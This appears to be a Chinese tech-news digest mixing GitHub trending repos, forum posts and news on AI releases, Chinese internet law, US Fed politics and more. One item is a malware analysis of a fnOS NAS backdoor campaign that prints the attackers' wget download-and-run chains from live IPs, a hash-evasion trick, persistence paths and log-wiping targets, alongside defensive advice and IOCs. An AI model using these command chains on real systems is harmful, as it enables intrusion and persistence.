GitHub 热门榜单
排名 1:/ThePrimeagen/99
- 简介: Neovim AI代理做得对
- URL: https://github.com/ThePrimeagen/99
- 作者: ThePrimeagen
排名 2:/microsoft/BitNet
- 简介: 1位LLM的官方推理框架
- URL: https://github.com/microsoft/BitNet
- 作者: microsoft
排名 3:/microsoft/agent-lightning
- 简介: 点燃人工智能代理的绝对培训师。
- URL: https://github.com/microsoft/agent-lightning
- 作者: microsoft
排名 4:/PaddlePaddle/PaddleOCR
- 简介: 将任何PDF或图像文档转换为AI的结构化数据。一个强大、轻量级的OCR工具包,弥合了图像/PDF和LLM之间的差距。支持100多种语言。
- URL: https://github.com/PaddlePaddle/PaddleOCR
- 作者: PaddlePaddle
排名 5:/anthropics/claude-plugins-official
- 简介: 由Anthropic管理的高质量Claude代码插件的官方目录。
- URL: https://github.com/anthropics/claude-plugins-official
- 作者: anthropics
排名 6:/microsoft/PowerToys
- 简介: Microsoft PowerToys是一组实用程序,可帮助您自定义Windows并简化日常任务
- URL: https://github.com/microsoft/PowerToys
- 作者: microsoft
排名 7:/termux/termux-app
- 简介: Termux-适用于Android操作系统的终端模拟器应用程序,可通过各种软件包进行扩展。
- URL: https://github.com/termux/termux-app
- 作者: termux
排名 8:/openclaw/openclaw
- 简介: 你自己的人工智能助理。任何操作系统。任何平台。龙虾的方式。 🦞
- URL: https://github.com/openclaw/openclaw
- 作者: openclaw
排名 9:/pedroslopez/whatsapp-web.js
- 简介: NodeJS的WhatsApp客户端库,通过WhatsApp Web浏览器应用程序连接
- URL: https://github.com/pedroslopez/whatsapp-web.js
- 作者: pedroslopez
排名 10:/AlexanderGrooff/mermaid-ascii
- 简介: 在终端内渲染Mermaid图形
- URL: https://github.com/AlexanderGrooff/mermaid-ascii
- 作者: AlexanderGrooff
排名 11:/reconurge/flowsint
- 简介: 一个用于可视化、灵活和可扩展的基于图形的调查的现代平台。面向网络安全分析师和调查人员。
- URL: https://github.com/reconurge/flowsint
- 作者: reconurge
排名 12:/cline/cline
- 简介: IDE中的自主编码代理,能够创建/编辑文件、执行命令、使用浏览器等,每一步都需要您的许可。
- URL: https://github.com/cline/cline
- 作者: cline
v2ex 热门帖子
- 1.元宝开始撒钱了,大家捡个午饭钱吧
- 2.DNSecure
- 3.试用Antigravity搞了个画布应用,玄空飞星排盘风水布局,效率是真高
- 4.稳定高性价比大香蕉gemini3proimage(支持异步接口调用)支持高并发速刷、特惠claudecode、sora-2
- 5.小红书怎么找到一个曾经聊过天的账号?
热点新闻
公安部就《网络犯罪防治法》草案征求意见
公安部就《网络犯罪防治法》草案征求意见
公安部就《网络犯罪防治法》草案征求意见,规管全体中国公民和向中国境内提供服务者。
网络虚拟定位、远程控制工具的制作者应当向主管部门备案,并登记使用者的真实身份信息。
不得提供有偿删帖(屏蔽、替换、下沉信息)服务,平台处理删除违法信息申请时不得变相收费。
不得为已被“依法依规”封禁的内容或即时通信账号提供解封等技术支持或帮助。不得无正当理由大量持有非本人注册的账号。
不得在他人设立的非法支付平台上流转资金,不得在他人设立的淫秽赌博网站上投放广告。
不得植入用户无法卸载或未经用户同意的非基本功能软件。
跨境黑灰产受刑事处罚者,地级以上公安机关可决定其在出狱后0.5~3年内不准出境。
境外个人利用网络信息损害国家主权安全的,有关部门可以冻结财产、限制入境。
消息来源: 中华人民共和国公安部 / 竹新社
↩️🖼 请立即停止公网暴露 fnOS Web 管理页面
重要/漏洞:飞牛 fnOS 疑似遭公网未授权访问/利用后植入后门组件 漏洞编号:暂无(官方未公开 / 未分配 CVE) 重要等级:严重(高危) CVSS 分数:暂无 影响范围: fnOS 设备存在公网可达入口(端口映射/反代/直连公网)时风险显著上升;官方建议升级至 1.1.15 并验证关闭公网映射后异常是否停止。 论坛反馈即使仅使用 HTTPS 访问也可能出现同类驻留现象,说明风险不应仅限定为 HTTP 明文通道(可能存在其他公网暴露面、历史入侵残留或服务端漏洞可经 HTTPS 触发) 受影响系统:…
请立即停止公网暴露 fnOS Web 管理页面
我们通过联系多位遭遇入侵的用户并分析相关记录发现,本次针对 fnOS 的漏洞利用活动呈现多团伙、多基础设施特征:疑似存在 2–3 个利用团伙,攻击流程较为成熟,并观察到多个 C2(命令与控制)域名用于回连与任务下发。当前已明确捕捉到 DDoS 攻击指令,被入侵设备存在被纳入僵尸网络风险。
根据网络空间测绘(网站空间)统计,全网可直接访问并暴露 fnOS Web 页面设备约 306,766 台。
注意:该数字来自公开测绘快照,受扫描时间点、动态公网 IP、端口映射/反代、去重口径等影响,实际暴露规模可能与该值不一致,仅用于风险态势评估。
时间线
最早入侵记录:约 12 天前(1 月 19 日左右)
用户察觉异常:约 10 天前(1 月 21 日左右),主要因设备出现对外异常行为(含对外攻击/连接异常增多)导致网络不稳定而被发现
1 月 21–22 日期间观测到任务/指令下发行为
综合判断:攻击者至少利用了约 3–4 天“空窗期” 在用户察觉前完成感染、持久化与回连准备
官方侧:据反馈,官方约在 1 月 21 日左右因用户集中反映“建立大量连接、网络不稳定”等现象,才进一步定位并确认漏洞风险
强调
所有用户立刻停止公网暴露 fnOS Web 管理页面。
这是当前最关键、最有效的止损措施。无论是否升级、是否自查“暂未发现异常”,都不要再让 Web 管理面可被公网直接访问。
“升级到新版本”并不等于风险解除。
目前无法确认新版本已覆盖全部修复点,仅依赖升级不能作为安全保证;在 Web 仍暴露公网的情况下仍可能被再次利用或二次入侵。
官方目前未公开可复用、可验证的完整处置方案。
因此不建议在联网状态下“边运行边清理”。
不要指望“屏蔽某个 IP / 屏蔽单个 C2 域名”解决问题。
已确认存在多个 C2 域名/基础设施轮换,单点封堵不一定有效,且可能快速失效。
已捕捉到 DDoS 指令:被控设备可能被用来对外攻击。
这不仅会造成你的网络被打满、设备性能异常、业务不可用,也可能引发运营商封禁。
处置
A1. 未发现入侵迹象的用户:
1.立即关闭公网访问,撤销端口映射/公网反代/暴露端口;仅允许内网访问,或使用 VPN/零信任网关进入内网后访问管理面;在网关处限制来源 IP(最小化暴露面)。
2.持续监控
再次强调:未中招用户也不要再暴露 Web。“没被打到”不代表安全,反而意味着资产仍处于可被扫描与补种的窗口内。
A2.已疑似/确认中招的用户
第一步:立刻断网隔离(物理断网优先)。
不要让设备继续联网回连 C2,也不要让其继续执行任务或触发 DDoS。
第二步:在断网环境下清除与排查(不要边联网边操作)。
中招用户共识建议:离线状态下进行木马清除、检查并处理定时任务/计划任务、启动项、可疑账号与权限、异常容器/进程、异常文件变更等持久化点。
第三步:清理完成前不要恢复联网。
在缺乏完整、可验证的清除方案前,贸然联网可能导致再次回连、二次下发任务或触发破坏行为。
第四步:保留日志与证据。
↩️ 目前我们已向相关服务商发送 Abuse 邮件,要求对涉事基础设施进行停用/下线处理,但截至发稿仍未收到有效回复或处置结果。为降低继续外联与二阶段下载风险…
重要/漏洞:飞牛 fnOS 疑似遭公网未授权访问/利用后植入后门组件 漏洞编号:暂无(官方未公开 / 未分配 CVE) 重要等级:严重(高危) CVSS 分数:暂无 影响范围: fnOS 设备存在公网可达入口(端口映射/反代/直连公网)时风险显著上升;官方建议升级至 1.1.15 并验证关闭公网映射后异常是否停止。 论坛反馈即使仅使用 HTTPS 访问也可能出现同类驻留现象,说明风险不应仅限定为 HTTP 明文通道(可能存在其他公网暴露面、历史入侵残留或服务端漏洞可经 HTTPS 触发) 受影响系统:…
目前我们已向相关服务商发送 Abuse 邮件,要求对涉事基础设施进行停用/下线处理,但截至发稿仍未收到有效回复或处置结果。为降低继续外联与二阶段下载风险,建议受影响用户在网关/防火墙侧立即手动封禁以下 IOC(域名与 IP),并同时开启出站日志记录以便后续溯源与复核:
域名:aura[.]kabot[.]icu
IP:20[.]89[.]168[.]131
IP:45[.]95[.]212[.]102
IP:151[.]240[.]13[.]91
重要/漏洞:飞牛 fnOS 疑似遭公网未授权访问/利用后植入后门组件
重要/漏洞:飞牛 fnOS 疑似遭公网未授权访问/利用后植入后门组件
漏洞编号:暂无(官方未公开 / 未分配 CVE)
重要等级:严重(高危)
CVSS 分数:暂无
影响范围:
fnOS 设备存在公网可达入口(端口映射/反代/直连公网)时风险显著上升;官方建议升级至 1.1.15 并验证关闭公网映射后异常是否停止。
论坛反馈即使仅使用 HTTPS 访问也可能出现同类驻留现象,说明风险不应仅限定为 HTTP 明文通道(可能存在其他公网暴露面、历史入侵残留或服务端漏洞可经 HTTPS 触发)
受影响系统:
fnOS(版本范围未公开)。官方社区回复称该问题官方已知,建议升级至 1.1.15,并在关闭公网端口映射后验证异常上传/连接是否停止。
木马行为分析
目前LoopDNS频道编辑已获取相关木马文件,下为行为分析
1. 入侵者在通过未公开入口/利用链投放后门下载器后并执行
下载二阶段载荷并执行(观测到的命令链)
cd /tmp
wget http://20.89.168.131/nginx
chmod 777 nginx
head -c 16 /dev/urandom >> nginx(向文件追加随机字节,改变哈希,规避基于哈希的检测)
./nginx
wget http://20.89.168.131/trim_https_cgi
chmod 777 trim_https_cgi
head -c 16 /dev/urandom >> trim_https_cgi
./trim_https_cgi
外联与拉取补充组件
HTTP:GET http://151.240.13.91/trim_fnos
TCP:连接 45.95.212.102:6608
2.后门驻留组件 gots
A1. 写入后门主体与持久化文件
创建/写入:/sbin/gots
创建/写入:/etc/rc.local、/etc/rc.d/rc.local
创建/写入 systemd 服务(变种服务名):
/etc/systemd/system/x86.service
/etc/systemd/system/<sha256>.service
执行持久化:systemctl enable <service>.service(含重定向到 /dev/null 的静默执行)
自身复制/改名落地:
/usr/bin/x86(样本发生目录重命名/落地)
/usr/bin/<sha256>(样本发生目录重命名/落地)
A2. C2 通信与探测
DNS:解析 aura.kabot.icu -> 45.95.212.102
TCP:连接 45.95.212.102 多端口(观测到:3489、5098、6608、7489)
论坛样本显示的附加行为(strings/排查结论)
干扰系统工具:重命名/替换 cat(出现 mv /usr/bin/cat /usr/bin/cat2 等字符串,导致“cat 丢失”现象)
结束系统进程:pkill -f 'network_service|resmon_service'
修改持久化入口:改写 /etc/rc.local 与 /etc/systemd/system/%s.service 并 systemctl enable
外联:包含 45.95.212.102 字符串并进行访问
3. 组件 trim_https_cgi
清理痕迹
清空多目录日志:/var/log/*、/usr/trim/logs/*、/run/log/journal 等
删除审计日志:/var/log/audit/audit.log 及滚动文件
删除/清理安全相关日志:/var/log/secure*、/var/log/messages*、wtmp/btmp/lastlog 等
干扰业务与恢复功能
结束服务:pkill -f backup_service、pkill -f sysrestore_service 等
二阶段下载执行与启动脚本注入
修改 /usr/trim/bin/system_startup.sh,追加下载执行链:
wget http://151.240.13.91/turmp -O /tmp/turmp ; chmod 777 /tmp/turmp ; /tmp/turmp
端口相关痕迹与疑似隐藏监听(来源于论坛排查)
目标系统存在 0.0.0.0:57132 LISTEN,ss/netstat 无 PID,lsof/fuser 无结果
trim_https_cgi 字符串包含 57132,并出现 kill -9 $(lsof -t -i:57132) 之类处理逻辑(提示该端口为其链路的一部分)
4.内核模块 snd_pcap(论坛排查)
/etc/modules 被追加 snd_pcap
模块文件:/lib/modules/6.12.18-trim/snd_pcap.ko
与“57132 监听无 PID/无 lsof 结果”的现象存在关联怀疑(疑似内核层隐藏/驻留能力)
关键落地痕迹
不可变属性(immutable,需先 chattr -i 才能删除):
/usr/bin/nginx
/usr/sbin/gots
/usr/trim/bin/trim_https_cgi
/etc/systemd/system/nginx.service
/etc/systemd/system/trim_https_cgi.service
/etc/rc.local
伪装/复用:/usr/bin/nginx 与 /usr/sbin/gots md5 相同(同一载荷多名称投放)
rc.local 自启:/sbin/gots x86 &
systemd 自启(示例):ExecStart=/usr/bin/nginx x86(oneshot + enable)
可疑网络基础设施(IOC)
IP:45[.]95[.]212[.]102(C2/多端口连接)
IP:151[.]240[.]13[.]91(HTTP 拉取二阶段:/trim_fnos、论坛样本)
域名:aura[.]kabot[.]icu(解析到 45[.]95[.]212[.]102)
下载源:20[.]89[.]168[.]131(HTTP 拉取:/nginx、/trim_https_cgi)
归属信息:45[.]95[.]212[.]102 与 151[.]240[.]13[.]91 两个 IP 均归属 AS209554 ISIF OU 提供商网段
处置建议
1. 关闭公网端口映射/源站直通。
2. 升级 fnOS 至官方建议版本(1.1.15 或更高)。
3. 出口防火墙封禁:45.95.212.102、151.240.13.91,同时监控连接数与上传是否回落。
4. 轮换所有管理口令/密钥;检查容器、计划任务、数据盘是否存在触发残留(官方提示“重装后仍可能再次触发”)。
参考来源:飞牛社区
🎬 重磅!谷歌Genie3世界模型抽象实测!
虽然已经很强了,但是并不能保持和上传图片的一致性,有点卡也难操控,现在还属于测试版,未来可期,真能在GTA6发售之前玩上自己做的GTA6了[汤圆]
Video is too big
↩️ GitHub 仓库已从归档状态成功恢复,相关作者已获取保候审。此前,该作者失联已达一个月。
第三方 Mihomo GUI「Sparkle」作者疑似失联,GitHub 仓库出现异常变动 知名第三方 Mihomo GUI「Sparkle」项目近日出现异常变动。有消息称其作者疑似失联并可能被中国警方控制,但相关情况尚未获得官方或权威渠道证实。经核实,该项目在 GitHub 上新增了一个名为 deleted 的分支并被设为主分支,仓库同时已被设置为归档(Archived)状态;此外,作者关联的 Telegram 账号最后一次上线时间为北京时间 12 月 28 日 10:24。项目相关社区渠道目前已停止更新,事件仍在进一步核实中。…
GitHub 仓库已从归档状态成功恢复,相关作者已获取保候审。此前,该作者失联已达一个月。
@fxtrader The Chinese government floods X search results with porn whenever there is political unrest—to prevent their citizens from finding out real…
@fxtrader The Chinese government floods X search results with porn whenever there is political unrest—to prevent their citizens from finding out real-time information.
This has been a difficult problem to solve but we are aware & working on it. origin source
Google Genie 3世界模型开始向美国Google AI Ultra用户开放体验
Google Genie 3世界模型开始向美国Google AI Ultra用户开放体验
2026年1月29日,Google在官方博客宣布推出Project Genie(实验性研究原型),并称已开始在美国向Google AI Ultra订阅用户(18岁以上)逐步开放访问,用于创建、探索并混搭重制交互式世界。
此次开放的主要是Google Labs里的Project Genie网页原型(体验入口)Project Genie由Genie 3驱动,并结合Nano Banana Pro与Gemini提供生成与交互能力。文字或上传/生成图片“勾勒世界”(可在进入前预览并微调画面,支持第一/第三人称视角等设置)、在世界中实时探索(移动时实时生成前方路径并可调镜头)、以及基于他人作品的提示词进行“重制/再创作”,并可下载探索视频。google blog
生成世界可能不够逼真或不完全符合提示词/物理规律;角色控制可能出现延迟;单次生成/体验时长目前限制为60秒;此外,Genie 3在2025年8月公布的一些能力(例如可用文本触发的世界事件)尚未被纳入Project Genie原型。
Google DeepMind 发布 AlphaGenome
Google DeepMind 发布 AlphaGenome
2026年1月28日,Google DeepMind 在《Nature》发表论文《Advancing regulatory variant effect prediction with AlphaGenome》(DOI:10.1038/s41586-025-10014-0),并在官方博客更新中给出模型获取入口与代码资源;AlphaGenome 早在2025年6月25日已通过非商业研究用途的API提供预览访问。
AlphaGenome 的核心定位是统一的DNA序列模型:输入最长可达100万碱基对(1 Mb)的DNA序列,在单碱基分辨率下输出上千条功能基因组预测轨迹,并可通过对比突变序列与参考序列的预测差异,对变异影响进行评分。
论文摘要列出的预测模态覆盖基因表达、转录起始、染色质可及性、组蛋白修饰、转录因子结合、染色质接触图谱,以及剪接位点使用与剪接连接(splice junction)坐标/强度等;作者称其目标是缓解既有方法在长序列上下文与高分辨率预测之间的取舍。
开放与使用方式方面,DeepMind 在 GitHub 发布了配套研究代码(含JAX实现与API实现),代码采用 Apache-2.0 许可;预训练权重可在 Kaggle 或 Hugging Face 下载,但需接受非商业模型条款。仓库同时提示本地运行对算力要求较高(例如建议使用H100级别GPU)。
在评测结果上,论文报告:在变异效应预测的26项评估中,AlphaGenome 有25项达到或超过“最强外部模型”的表现;并展示了其在TAL1致癌基因附近的临床相关变异机制复现能力。训练数据方面,DeepMind 表示模型使用了多个公共联盟数据资源(包括 ENCODE、GTEx、4D Nucleome、FANTOM5 等),覆盖人类与小鼠多种细胞类型/组织的调控相关测量信号;其应用重点指向占基因组大部分的非编码调控区域(常被描述为约98%)。
外部反馈与限制方面,多位专家在 Science Media Centre 的评论中强调:模型在若干任务上表现突出,但细胞类型特异性调控仍是挑战,且目前并不适合直接用于临床患者决策;媒体报道也提示其仍需要实验验证、并受训练物种范围等因素限制。
STAT 报道称,AlphaGenome 自2025年6月上线预览以来,已有接近3000名来自160个国家的科研人员通过API进行非商业研究使用,API日调用量约100万次(DeepMind在发布会上对媒体披露)。
Google Deepmind
Qwen 开源 Qwen3-ASR 与 Qwen3-ForcedAligner
Qwen 开源 Qwen3-ASR 与 Qwen3-ForcedAligner
Qwen 团队在 2026 年 1 月 29 日宣布开源 Qwen3-ASR 系列(1.7B、0.6B)及 Qwen3-ForcedAligner-0.6B,并在 GitHub 提供代码与推理/部署示例;模型权重同步发布到 Hugging Face/ModelScope,项目采用 Apache-2.0 许可证。
Qwen3-ASR 将语种识别与 ASR 合并为单模型“all-in-one”流程:官方说明其覆盖 52 个语种与方言,其中包括 30 种语言与 22 种中文口音/方言;推理侧同时支持离线与流式,并面向语音、歌唱及带 BGM 的歌声等音频类型。
配套的 Qwen3-ForcedAligner-0.6B 采用非自回归(NAR)时间戳预测方式,用于文本-语音对的强制对齐;官方给出的语种覆盖为 11 种语言,并宣称其时间戳精度在评测中优于多种主流强制对齐方案。效率指标方面,技术报告给出的示例为:Qwen3-ASR-0.6B 在 128 并发下可实现“1 秒转写 2000 秒语音”,平均首 Token 延迟(TTFT)最低 92ms;同时报告与仓库将 1.7B 版本描述为开源模型中的 SOTA,并称其可对标最强商业 API(均为自述评测结论)。
工具链方面,仓库提供 qwen-asr PyPI 包(Transformers 与 vLLM 两种后端)、本地 Gradio Web UI 与浏览器麦克风流式 Demo、以及 Docker 镜像与 vLLM 服务化命令封装,目标是覆盖批处理、高并发与在线服务场景。
huggingface
【凯文.沃什】通胀是一种选择
【凯文.沃什】通胀是一种选择
Inflation Is A Choice: Kevin Warsh On Fixing The Federal Reserve
YouTube
Inflation Is A Choice: Kevin Warsh On Fixing The Federal Reserve | Uncommon KnowledgeHas the Fed lost its way? Kevin Warsh, Hoover visiting fellow and on the short list of candidates to be the next chairman of the Federal Reserve, thinks the Fed has and offers solutions on how to fix it.
Drawing on his firsthand experience during the 2008…
↩️ 特朗普宣布前美联储理事凯文·沃什为美联储主席候选人。
我很高興地宣布,我提名凱文·沃什 (Kevin Warsh) 擔任聯邦儲備系統理事會主席。凱文目前擔任胡佛研究所謝潑德家族傑出經濟學訪問學者以及斯坦福大學商學院講師。他是杜肯家族辦公室有限責任公司斯坦利·德魯肯米勒 (Stanley Druckenmiller) 的合夥人。凱文 (Kevin) 獲得了學士學位斯坦福大學學士學位和哈佛大學法學院法學博士學位。他在經濟和金融領域進行了廣泛的研究。凱文向英格蘭銀行發表了一份獨立報告,提議對英國貨幣政策的實施進行改革。議會採納了報告的建議。凱文·沃什 (Kevin…
特朗普宣布前美联储理事凯文·沃什为美联储主席候选人。
“我认识凯文很久了,我毫不怀疑他将成为美联储历史上最伟大的主席之一,甚至可能是最伟大的主席。他简直就是完美人选,绝对不会让人失望。”
↩️ 台湾,教育部常务次长朱俊彰1月30日表示,抖音、小红书、微信、微博、百度云盘等App已被数发部认定有信息安全风险,且危害儿少身心健康。除数发部已采取的…
台湾,教育部常务次长朱俊彰1月30日表示,抖音、小红书、微信、微博、百度云盘等App已被数发部认定有信息安全风险,且危害儿少身心健康。除数发部已采取的禁止校园公务设备下载使用、中小学TANet阻断上述服务的措施外,教育部所属机关学校iTaiwan无线网也将阻断上述服务。 目前,台湾中小学TANet的过滤机制均为DNS阻断,用户在浏览器设置DoH即会失效。去年12月警方在全台阻断小红书域名解析,也仅影响了其网页加载,App仍可照常使用。 (中华民国教育部)
台湾,教育部常务次长朱俊彰1月30日表示,抖音、小红书、微信、微博、百度云盘等App已被数发部认定有信息安全风险,且危害儿少身心健康。除数发部已采取的禁止校园公务设备下载使用、中小学TANet阻断上述服务的措施外,教育部所属机关学校iTaiwan无线网也将阻断上述服务。
目前,台湾中小学TANet的过滤机制均为DNS阻断,用户在浏览器设置DoH即会失效。去年12月警方在全台阻断小红书域名解析,也仅影响了其网页加载,App仍可照常使用。
预测市场Polymarket最新显示,沃什被特朗普提名为美联储新主席的概率飙升至95%。
预测市场Polymarket最新显示,沃什被特朗普提名为美联储新主席的概率飙升至95%。
沃什长期以偏鹰派立场著称,这一预期迅速推升美元和美债收益率,并对商品价格形成压制。内外盘期货普遍下行,贵金属成为跌幅最为集中的品种。
沃什曾在近期的一场深度访谈中直言,通胀是美联储的责任,不能归咎于外界因素。他给出的改革方案并非推倒重来,而是主张美联储需要"复兴"而非"革命"。针对高利率困境,沃什认为,可以通过缩表换取低利率空间。"如果我们让印钞机安静一点,利率其实可以更低。"
wallstreetcn.com/articles/3761461
↩️🖼 后续:BiliBili法务部门要求彻底清除GitHub项目历史记录
GitHub热门B站API bilibili-API-collect 项目收到律师函后宣布永久关停 1月28日,GitHub 仓库 SocialSisterYi/bilibili-API-collect(哔哩哔哩 API 收集整理)维护者在 README 中公告称:已收到“B站委托的律师事务所”发出的律师函警告邮件,指控该项目对哔哩哔哩平台“非公开 API 接口及其调用逻辑、参数结构、访问控制及安全认证机制”进行系统性收集整理并向公众传播,构成侵权;仓库即日起停止维护并删除相关文档及源代码。 GitHub…
后续:BiliBili法务部门要求彻底清除GitHub项目历史记录
在1月28日宣布永久关停后,GitHub上的bilibili-API-collect项目继续受到B站法务部门的关注。根据1月30日发出的律师函,B站指出尽管项目已归档为只读状态,但通过代码变更历史(diff)等方式,侵权内容仍可能被恢复。法务部门要求项目方彻底删除所有相关代码及历史记录,确保无法恢复。若未能满足此要求,B站将继续采取法律措施。
巴拿马最高法院宣布,长江和记实业子公司和记港口持有的巴拿马运河两端主要港口(巴尔博亚港和克里斯托瓦尔港)的特许权违宪。
巴拿马最高法院宣布,长江和记实业子公司和记港口持有的巴拿马运河两端主要港口(巴尔博亚港和克里斯托瓦尔港)的特许权违宪。
巴拿马审计长诉讼指控政府审计存在违规行为。
法院声明称,裁决经过“广泛的审议和讨论”。巴拿马将对上述港口进行招标。
长和股价一度跌超5%。
来源:FT
监管通报某基金公司违规销售:责令改正并暂停新发 追究总经理等相关负责人责任
监管通报某基金公司违规销售:责令改正并暂停新发 追究总经理等相关负责人责任
近日监管发布机构监管通报称,某基金公司管理的基金产品单日申购量超百亿,涉嫌违规销售,经核查,基金公司与不具备基金销售业务资格和基金从业资格的互联网“大V”开展营销合作,向其支付大额广告费,以互联网“大V”在平台上预告某日(将)大额购入D基金公司的A产品为噱头,利用互联网“大V”的流量和影响力鼓动投资者跟进购买A产品,诱导风险承受能力不匹配的投资者购买中高风险产品。经查,公司未对投资者充分揭示风险,投资者适当性管理不到位,违法相关法律法规,监管对该公司采取责令改正并暂停受理公募基金产品注册的监管措施,同步追究公司总经理、督察长、互联网业务部门负责人等责任人员责任。
热点新闻
热点新闻
一名全国人大代表1月29日深夜在法国遭窃贼入屋盗窃,损失超700万欧元财物。 法国检方表示,案发于巴黎高级住宅区第16区,受害人在住所睡觉时遭窃贼袭击,被抢走…
一名全国人大代表1月29日深夜在法国遭窃贼入屋盗窃,损失超700万欧元财物。
法国检方表示,案发于巴黎高级住宅区第16区,受害人在住所睡觉时遭窃贼袭击,被抢走名表、珠宝等贵重物品,估计损失达700万欧元。
受害人说头部受袭,两名窃贼事后逃去,警方说没有强行闯入的迹象,怀窃贼是盗用锁匙入室。
(无线新闻,法广)
↩️ 公安部就《网络犯罪防治法》草案征求意见,规管全体中国公民和向中国境内提供服务者。 任何个人和组织不得违规制售提供设备、软件、工具、线路、服务,为他…
《国家网络身份认证公共服务管理办法》自7月15日起施行。相比征求意见稿,增加规定: 网号自愿推广,各政企单位应当保留提供现有的或者其他合法实名制方式。互联网平台应保障其他实名制方式享有同等服务。 网号服务可以向互联网平台提供未成年、老年人等年龄标识信息,以支持其履行相应的法律义务。 网号服务发生运行或数据安全事件时,应当及时告知用户。 截至目前,“国家网络身份认证”App累计下载1600万次,申领开通600万人,提供认证服务1250万次。 (中央网信办)
公安部就《网络犯罪防治法》草案征求意见,规管全体中国公民和向中国境内提供服务者。
任何个人和组织不得违规制售提供设备、软件、工具、线路、服务,为他人获取传播被阻断的境外违法信息提供技术支持或者帮助。
网络虚拟定位、远程控制工具的制作者应当向主管部门备案,并登记使用者的真实身份信息。
违反以上两条者,没收所得,并处所得一倍以上、50万(或所得十倍)以下罚款;情节严重的,并处十五日以下拘留。
不得提供有偿删帖(屏蔽、替换、下沉信息)服务,平台处理删除违法信息申请时不得变相收费。
不得为已被“依法依规”封禁的内容或即时通信账号提供解封等技术支持或帮助。不得无正当理由大量持有非本人注册的账号。
不得在他人设立的非法支付平台上流转资金,不得在他人设立的淫秽赌博网站上投放广告。
不得植入用户无法卸载或未经用户同意的非基本功能软件。
跨境黑灰产受刑事处罚者,地级以上公安机关可决定其在出狱后0.5~3年内不准出境。
境外个人利用网络信息损害国家主权安全的,有关部门可以冻结财产、限制入境。
(中国公安部)
↩️ 中共中央政治局1月30日下午第24次集体学习“前瞻布局和发展未来产业”,信通院院长余晓晖主讲。 习近平讲话:综合考虑国家战略需求、技术成熟程度、要素支…
中共中央政治局12月25、26日开年终民主生活会,5道检讨题目分别是“强化政治忠诚、提高政治能力”“固本培元、增强党性”“敬畏人民、敬畏组织、敬畏法纪”“干事创业、担当作为”“扛起管党治党责任”。 习近平逐一点评并总结:要深入基层一线,注意倾听不同声音,做到对实情心中有数。安守本分,如临如履,怀德自重。严格遵守议事决策规则,自觉按制度规矩办事。 二十届中纪委五次全会已定于1月12–14日召开。 (新华社,视频:新闻联播)
中共中央政治局1月30日下午第24次集体学习“前瞻布局和发展未来产业”,信通院院长余晓晖主讲。
习近平讲话:综合考虑国家战略需求、技术成熟程度、要素支撑条件等因素,因地制宜、错位发展。
大力发展科技金融,全方位做好人才培养、引进、使用工作,在全社会营造鼓励创新的浓厚氛围。
探索科学有效的监管方式,防范相关风险。在国际积极推动各方标准共建、规则共商、产业共促。
(新华社,视频:新闻联播)
↩️ 应急管理部长王祥喜涉嫌严重违纪违法,现正接受中纪委审查调查。 王祥喜1962年生,2017年任湖北省政法委书记,2019年任国能集团董事长,2022年任应急管理部…
张冬辰(中国星网董事长)曹建国(中国航发董事长)刘国跃(国能集团董事长)马正武(中国融通原总经理)樊友山(中国电科原总经理)曾毅(中国电子董事长)俞培根(东方电气原董事长)王行环(武大中南医院院长),以上八人12月24日被撤销十四届全国政协委员资格。中纪委未曾披露过他们有无违纪违法。 中共12月22、23日开中央企业负责人会议,张国清主持,李强讲话,传达习近平指示。 (新华社,视频:新闻联播)
应急管理部长王祥喜涉嫌严重违纪违法,现正接受中纪委审查调查。
王祥喜1962年生,2017年任湖北省政法委书记,2019年任国能集团董事长,2022年任应急管理部长、党委书记(国家消防救援局第一政委)至今。二十届中央委员。
(中央纪委国家监委)
↩️ 美国参议院1月30日晚以71票赞成、29票反对的结果通过拨款法案。但由于众议院预计将于2月2日才能审议拨款法案,这意味着政府仍将短暂“停摆”。 参议院批准…
近日两起美国公民被枪杀案引发国会预算争议,并可能于周五午夜引发部分政府停摆。民主党议员拒绝批准移民执法行动预算,而共和党议员试图打包通过包括移民执法在内的六项预算案,总计占联邦政府运行 70% 以上。 枪击案引发共和党内分裂,部分共和党议员要求对枪击案进行调查。 而第二起重症护士被枪杀案,也引起了政府破坏拥枪权的争议。国土安全部长诺姆、联邦调查局局长帕特尔等官员,谴责被枪杀的普雷蒂其携带枪支参加抗议活动。边境巡逻队指挥官博维诺暗示普雷蒂“想要屠杀执法人员”。 但现场视频显示普雷蒂手持手机,帮助一名被执法人…
美国参议院1月30日晚以71票赞成、29票反对的结果通过拨款法案。但由于众议院预计将于2月2日才能审议拨款法案,这意味着政府仍将短暂“停摆”。
参议院批准的拨款法案将国土安全部的资金剥离出来。国土安全部的资金将临时延长2周,为国会两党对移民执法行动实施限制谈判提供时间。
(美联社,路透社)
↩️ 以色列1月30日宣布,拉法口岸将从2月1日起允许“有限的人员流动”。进出人员需要接受以色列和埃及双方的检查。 (美联社)
以色列1月26日宣布找到最后一具人质遗体。遗体身份已确认为拉恩·格维利,将被送回以色列安葬。以色列总理办公室25日称,一旦找到遗体将重新开放拉法口岸。 以色列当局尚未就何时重开拉法口岸置评。哈马斯发言人表示,遗体的发现确认了哈马斯对美国“20点计划”的承诺,哈马斯将继续维护全部协议。 人质找到后,协议将进入下一阶段,包括加沙重建和非军事化。 (美联社,路透社)
以色列1月30日宣布,拉法口岸将从2月1日起允许“有限的人员流动”。进出人员需要接受以色列和埃及双方的检查。
(美联社)
↩️🖼 特朗普1月30日宣布,将提名美联储前理事凯文·沃什担任下任美联储主席。 沃什在美联储任职期间曾以反对通胀闻名,但现在他主张降息,并呼吁对美联储进…
特朗普8月25日以涉嫌住房抵押贷款欺诈为由宣布立即解雇美联储理事莉萨·库克。库克声称特朗普无权解雇,她将继续履职。 特朗普任命的联邦住房金融署署长比尔·普尔特20日指控库克曾同时将两处房产申报为其“主要住宅”以获取更优惠贷款利率。司法部21日表示将对库克展开调查。 特朗普25日发表公开信称,鉴于库克“在金融问题上存在欺骗行为且可能构成犯罪”,其诚信度令人怀疑。根据《联邦储备法》,总统只能“因故”解雇美联储理事,但法律并未明确“因故”的具体内容。 库克通过律师回应称,特朗普总统将其解雇缺乏法律依据及相关权力…
特朗普1月30日宣布,将提名美联储前理事凯文·沃什担任下任美联储主席。
沃什在美联储任职期间曾以反对通胀闻名,但现在他主张降息,并呼吁对美联储进行全面改革。该提名需得到参议院批准。如果批准,沃什将在5月现任主席鲍威尔任期结束后接任。
接近沃什的消息人士称,沃什的外貌是特朗普选择他的原因之一。特朗普认为沃什长得像美联储主席,并多次对沃什说:“你长得不错”。此外,沃什的岳父、特朗普的支持者罗恩·劳德等人都开展了游说工作。
(美联社,路透社)
